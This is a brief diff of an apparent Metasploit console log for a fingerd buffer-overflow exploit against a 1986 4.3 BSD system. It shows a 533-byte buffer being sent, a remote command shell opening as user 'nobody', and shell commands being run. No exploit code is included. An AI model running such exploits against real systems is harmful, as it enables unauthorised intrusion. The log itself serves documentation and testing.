 [*] 127.0.0.1:79 - Connecting to fingerd
 [*] 127.0.0.1:79 - Sending 533-byte buffer
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600

-whoami
-nobody
+who am i
+nobody   tty??   Feb  6 13:45
 cat /etc/motd
 4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

--- a/Show More
+++ b/Show More